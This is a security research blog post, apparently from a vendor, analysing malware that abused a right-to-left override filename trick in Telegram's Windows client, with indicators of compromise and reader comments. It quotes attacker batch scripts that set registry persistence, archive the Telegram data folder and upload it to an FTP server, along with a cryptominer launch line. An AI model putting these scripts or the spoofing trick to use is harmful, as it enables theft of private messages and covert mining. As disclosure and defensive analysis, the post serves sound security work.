Research

Zero-day vulnerability in Telegram

Cybercriminals exploited Telegram flaw to launch multipurpose attacks.

In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell

The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.

Launching an attack on Telegram

Below is an account of how this vulnerability was exploited in Telegram:

    • The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:

evil.js -> photo_high_re*U+202E*gnp.js
Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js.

  • The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:

 

 

  • When the user clicks on this file, the standard Windows security notification is displayed:

 

Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.

Exploitation in the wild

After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control

The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules.

Attack flowchart

At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol:

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

When launched, it modifies startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment:

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:

Command
(English translation)
Function
“Онлайн
(Online)
Send list of files in directory to control bot.
“Запус
(Launch)
Launch executable file using Process.Start().
“Логгер
(Logger)
Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content.
“Скачать
(Download)
Download file into its own directory.
“Удалить
(Delete)
Delete file from its own directory.
“Распаковать
(Unpack)
Unpack archive in its own directory using specified password.
Убить
(Kill)
Terminate specified process using process.Kill()
Скачат
(Download)
Same as ‘Download’ (see above), with different command parsing.
Запуск
(Launch)
Same as ‘Launch’ (see above), with different command parsing.
Удалить
(Delete)
Same as ‘Delete’ (see above), with different command parsing.
Распаковать
(Unpack)
Same as ‘Unpack’ (see above), with different command parsing.
Процессы
(Processes)
Send a list of commands running on target PC to control bot.

An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user.

Miners and more

Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet.

Scenario #1

Attack flowchart

At the first stage of the attack, an SFX archive with a script is used that launches an executable file:

Path=%temp%adr
Setup=%temp%adrrun.exe
Silent=1
Overwrite=2

This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:

As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security.

Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.

  • nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator:
  • taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path:

We have seen several versions of this batch script, some of which have extra features:

This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:

The attack flowchart is approximately as follows:

We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware.

The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents:

All components named st*.exe are executable PE files converted in a similar way from batch scripts.

The SFX script launches the component st1.exe:

Path=%temp%/adress
Setup=%temp%/adress/st1.exe
Silent=1
Overwrite=2

st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:

reg add HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunOnce /v RUN1 /d %temp%adressst2.exe /f

So the st2.exe file launches when system is booted next time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%sss
cd %temp%sss #Creates a temporary directory
“%temp%adressWinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%sss1.rar” “%appdata%Telegram Desktop” #Packs the Telegram directory into a RAR archive
TIMEOUT /T 60 /NOBREAK
:begin
ping -n 1 ya.ru |>nul find /i “TTL=” && (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe

As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:

@echo XXXXXXXX>command.txt
@echo XXXXXXXX>>command.txt
@echo binary>>command.txt
@echo mput %temp%sss*.rar>>command.txt
@echo quit>>command.txt
ftp -s:command.txt -i free11.beget.com
del command.txt
attrib %temp%/adress +H
attrib %temp%/adress* +H

On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims:

Each dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos.

Scenario #2

Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:

The payload is an SFX archive with the following script:

svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.

The script contains the appropriate comments:

The miner itself is launched as follows:

WshShell.Run “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, 0

The pool address is associated with the cryptocurrency Monero.

On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:

Conclusion

It appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected occurring in Russia. Also, while conducting a detailed research of these attacks we discovered a lot of artifacts that pointed to involvement by Russian cybercriminals.

We don’t have exact information about how long and which versions of the Telegram products were affected by the vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.

This paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and other methods of exploitation remain unknown.

IoC

MD5

First stage

650DDDE919F9E5B854F8C375D3251C21
C384E62E483896799B38437E53CD9749
FA391BEAAF8B087A332833E618ABC358
52F7B21CCD7B1159908BCAA143E27945
B1760E8581F6745CBFCBE76FBD0ACBFA
A662D942F0E43474984766197288845B

Payloads

B9EEC74CA8B14F899837A6BEB7094F65
46B36F8FF2369E883300F472694BBD4D
10B1301EAB4B4A00E7654ECFA6454B20
CD5C5423EC3D19E864B2AE1C1A9DDBBC
7A3D9C0E2EA27F1B96AEFED2BF8971A4
E89FDDB32D7EC98B3B68AB7681FACCFC
27DDD96A87FBA2C15B5C971BA6EB80C6
844825B1336405DDE728B993C6B52A83
C6A795C27DEC3F5559FD65884457F6F3
89E42CB485D65F71F62BC1B64C6BEC95
0492C336E869A14071B1B0EF613D9899
2CC9ECD5566C921D3876330DFC66FC02
1CE28167436919BD0A8C1F47AB1182C4

C2 servers

http://nord.adr[.]com[.]ua/

Filenames

name?gpj.exe
name?gpj.rar
address?gpj.scr
address_?gpj.scr
photoadr?gepj.scr

Zero-day vulnerability in Telegram

Your email address will not be published. Required fields are marked *

 

  1. Ivan

    Definitely not a zero-day

  2. stitch

    This is not a zero day. Windows has long known about the RLO bug and has refused to fix it. Criminals have been doing this with email attachments for years. file*U+202E*fdp.scr even makes windows show a PDF icon.

  3. Dylan

    Can I ask why you redact the suspects email ? Wouldn’t this information be useful to disclose publicly?

  4. sirati97

    Of year RTLO. A zero-day ‘vulnerability’. Also very much telegrams fault. Not at all also a Windows and OSX zero-day huh? I mean their warning dialogue is not affected by this at all.
    Please, guys, use terminology correctly…

  5. Phil

    Wait, the Windows security notification makes the same mistake?

  6. Daniel Lang

    “It appears that only Russian cybercriminals were aware of this vulnerability”. This is an excellent example of russophobia.

    The C2 server is actually in Ukraine. Why does this article conclude that those are Russian cybercriminals? The “mail.ru” service is also used by Ukranians. There are alot of Russian speaking countries: Ukraine, Moldova, Kazakhstan….etc. This exploit can come from ANY of those countries. How do you know for sure it comes from Russia?

  7. Bill

    I’m seeing a system that was running slowly and discovered in the Resource Monitor that Telegram Desktop was maxing out the CPU. I can suspend the process but it restarts and the CPU maxes again. I can suspend it and so far it stays suspended and CPU returns to normal.

    I found Telegram.exe living in C:\Users\All Users and C:\ProgramData. I can delete it if i’m quick by terminating it in Resource Monitor then quickly deleting it but it comes back. Renaming it prompts 3 windows asking if I really want to do that and after the rename goes through, about 5 seconds later download.vbs appears for a second then the name changes to Telegram.exe

    Any ideas how to get rid of this?

    1. sirati97.de

      this seems like malware hiding by using the name telegram. Shut down your computer and boot using the windows installation medium. Under more options, you can open a command prompt. Type notepad.exe and then open the open dialogue. With this, you can see the files. delete all files related to this malware. (Note down the path an filename with paper or so)
      now open Regedit and import your computers and users registry. Search for those paths and filenames you noted down and delete entiries of the malware. doing something wrong here can break your system completely. If you do not feel comfortable, please ask an expert or pay someone to do it.

  8. Anonymous

    Are mobile operating systems (Android and iOS) vulnerable to file extension spoofing as well?

    1. sirati97.de

      @Bill this seems like malware hiding by using the name telegram. Shut down your computer and boot using the windows installation medium. Under more options, you can open a command prompt. Type notepad.exe and then open the open dialogue. With this, you can see the files. delete all files related to this malware. (Note down the path an filename with paper or so)
      now open Regedit and import your computers and users registry. Search for those paths and filenames you noted down and delete entiries of the malware. doing something wrong here can break your system completely. If you do not feel comfortable, please ask an expert or pay someone to do it.

      @Anonymous Generally, this is a feature of Unicode, so every software and operating system is vulnerable. By now some have issued measures to stop this confusing behaviour. It is pather server-wise for telegram. So no telegram client is affected

    2. sirati97.de

      Generally, this is a feature of Unicode, so every software and operating system is vulnerable. By now some have issued measures to stop this confusing behaviour. It is pather server-wise for telegram. So no telegram client is affected

Reports

How to catch a wild triangle

How Kaspersky researchers obtained all stages of the Operation Triangulation campaign targeting iPhones and iPads, including zero-day exploits, validators, TriangleDB implant and additional modules.

Subscribe to our weekly e-mails

The hottest research right in your inbox